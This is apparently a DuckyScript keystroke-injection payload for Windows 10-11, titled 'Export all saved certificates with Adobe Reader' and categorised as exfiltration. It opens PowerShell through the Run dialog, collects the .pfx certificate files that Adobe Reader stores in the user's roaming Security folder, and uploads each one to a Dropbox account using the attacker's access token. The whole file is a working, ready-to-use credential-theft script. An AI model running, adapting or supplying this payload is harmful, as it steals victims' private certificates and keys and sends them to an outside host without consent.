* ####################################################################
* #                                                                  |
* # Title        : Export all saved certificates with Adobe Reader   |
* # Author       : Aleff                                             |
* # Version      : 1.0                                               |
* # Category     : Exfiltration                                      |
* # Target       : Windows 10-11                                     |
* #                                                                  |
* ####################################################################


* Requirements:
*     - Adobe Reader must be installed
*     - Internet Connection


GUI r
DELAY 1000
STRING PowerShell
DELAY 2000

* Settings about Adobe Reader
STRING $roamingFolderPath = [Environment]::GetFolderPath('ApplicationData')
ENTER
STRING $securityFolderPath = Join-Path -Path $roamingFolderPath -ChildPath 'Adobe\Acrobat\DC\Security'
ENTER
STRING $pfxFiles = Get-ChildItem -Path $securityFolderPath -Filter '*.pfx' -File
ENTER

* You must define your Dropbox accessToken or modify the exfiltration modality.
STRING $accessToken = "DROPBOX_ACCESS_TOKEN"
ENTER

STRING $authHeader = @{Authorization = "Bearer $accessToken"}

ENTER
STRING $uploadUrl = "https://content.dropboxapi.com/2/files/upload"

ENTER
STRING foreach ($file in $pfxFiles) {
ENTER
STRING $dropboxFilePath = "/$file"
ENTER
STRING $headers = @{}
ENTER
STRING $headers.Add("Authorization", "Bearer $accessToken")
ENTER
STRING $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
ENTER
STRING $headers.Add("Content-Type", "application/octet-stream")

ENTER
STRING Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $file
ENTER
STRING }; exit
ENTER